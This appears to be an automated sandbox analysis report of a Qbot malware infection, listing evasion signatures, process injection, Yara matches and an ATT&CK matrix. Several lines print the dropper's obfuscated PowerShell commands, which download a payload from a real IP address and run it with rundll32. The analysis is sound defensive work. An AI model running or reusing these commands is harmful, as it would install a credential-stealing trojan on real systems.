Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Renames NTDLL to bypass HIPS

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE!
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE(
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXED
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2789778162.0000000004677000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000010.00000003.2822824712.0000000004677000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROC_ANALYZER.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TCPDUMP.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: backgroundTaskHost.exe, 00000010.00000003.2823866326.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028	Thread sleep count: 7177 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3360	Thread sleep count: 8451 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3324	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 2156	Thread sleep time: -156000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 4572	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7177			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8451			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_15-37672

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000AFB9 GetSystemInfo,

15_2_1000AFB9

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000C547 FindFirstFileW,FindNextFileW,

15_2_1000C547

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000970D LoadLibraryA,GetProcAddress,

15_2_1000970D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_3_02E4222E mov eax, dword ptr fs:[00000030h]	15_3_02E4222E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_693417F4 mov eax, dword ptr fs:[00000030h]	15_2_693417F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_100010A0 mov eax, dword ptr fs:[00000030h]	15_2_100010A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_100026E5 mov eax, dword ptr fs:[00000030h]	15_2_100026E5

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_693720E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		15_2_693720E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_693720DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		15_2_693720DC

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: unknown target: C:\Windows\SysWOW64\backgroundTaskHost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 7C0000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: E61790			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 7C0000 protect: page read and write

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atkuf9 = '62889e73828c756c961c5a6d6c01a463'; [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnnldcbhmxlkrfjmut1hehznc0sncnnldcbhtff1q1j5nt1hsg5czfvnmg0kc2v0igfgzgl6swtedd1hylbtnxencnbvd2vyc2hlbgwgkg5ldy1vymply3qgc3lzdgvtlm5ldc53zwjjbgllbnqplmrvd25sb2fkzmlszsgnahr0cdovlzg3ljizni4xndyumzevmzgxotkuzgf0jywgj0m6xhbyb2dyyw1kyxrhxgdilmpwzycpow0kc2v0igfntwflm3bdpwf5yxuzdqpzzxqgyw1qdfvny0e9yvjaamuncmnhbgwgcnulmwxsmzigqzpcchjvz3jhbwrhdgfcz2iuanbnlfdpbmqncmv4axqncg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atkuf9 = '62889e73828c756c961c5a6d6c01a463'; [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnnldcbhmxlkrfjmut1hehznc0sncnnldcbhtff1q1j5nt1hsg5czfvnmg0kc2v0igfgzgl6swtedd1hylbtnxencnbvd2vyc2hlbgwgkg5ldy1vymply3qgc3lzdgvtlm5ldc53zwjjbgllbnqplmrvd25sb2fkzmlszsgnahr0cdovlzg3ljizni4xndyumzevmzgxotkuzgf0jywgj0m6xhbyb2dyyw1kyxrhxgdilmpwzycpow0kc2v0igfntwflm3bdpwf5yxuzdqpzzxqgyw1qdfvny0e9yvjaamuncmnhbgwgcnulmwxsmzigqzpcchjvz3jhbwrhdgfcz2iuanbnlfdpbmqncmv4axqncg=='))			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,CoInitializeEx,Sleep,	15_2_1000169F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	15_2_10002C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	15_2_10012137
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	15_2_1000338F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	15_2_1000FFF2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_69372030 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

15_2_69372030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000B231 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,

15_2_1000B231

Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2e6d518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2e6d518.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2709522277.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2e6d518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2e6d518.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2709522277.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	11 DLL Side-Loading	11 DLL Side-Loading	1 Scripting	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Windows Service	1 Windows Service	1 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	12 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	2 Registry Run Keys / Startup Folder	311 Process Injection	1 Software Packing	Security Account Manager	25 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	2 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Service Execution	Network Logon Script	Network Logon Script	11 DLL Side-Loading	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	2 PowerShell	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\e77242d6.dll	2%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	Avira URL Cloud	safe
https://cortana.ai	0%	Avira URL Cloud	safe
https://powerlift.acompli.net	0%	Avira URL Cloud	safe
https://powerlift.acompli.net	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://cortana.ai	0%	Virustotal		Browse
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	Virustotal		Browse
https://res.getmicrosoftkey.com/api/redemptionevents	0%	Avira URL Cloud	safe
https://powerlift-frontdesk.acompli.net	0%	Avira URL Cloud	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://start.microsoftapp.net/start?pc_campaign=UHF_Banner_15mkts&adjust=y9xgnyl_5sblqid"	0%	Avira URL Cloud	safe
https://api.scheduler.	0%	Avira URL Cloud	safe
https://my.microsoftpersonalcontent.com	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	Avira URL Cloud	safe
https://api.aadrm.com	0%	Avira URL Cloud	safe
https://dev0-api.acompli.net/autodetect	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	Avira URL Cloud	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/	0%	Avira URL Cloud	safe
https://officesetup.getmicrosoftkey.com	0%	Avira URL Cloud	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	Avira URL Cloud	safe
https://d.docs.live.net	0%	Avira URL Cloud	safe
https://ncus.contentsync.	0%	Avira URL Cloud	safe
https://apis.live.net/v5.0/	0%	Avira URL Cloud	safe
https://wus2.contentsync.	0%	Avira URL Cloud	safe
https://make.powerautomate.com	0%	Avira URL Cloud	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://outlook.live.com/owa/	de-ch[1].htm.16.dr	false		high
https://login.microsoftonline.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://www.onenote.com/?omkt=de-CH	de-ch[1].htm.16.dr	false		high
https://shell.suite.office.com:1443	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://autodiscover-s.outlook.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://cdn.entity.	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://api.addins.omex.office.net/appinfo/query	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://powerlift.acompli.net	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://cortana.ai	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/imports	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.aadrm.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.microsoftstream.com/api/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://cr.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	low
https://cdnssl.clicktale.net/www32/ptc/05d32363-d534-4d93-9b65-cde674775e71.js	de-ch[1].htm.16.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.2654006199.0000021A0C591000.00000004.00000800.00020000.00000000.sdmp	false		high
https://graph.ppe.windows.net	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
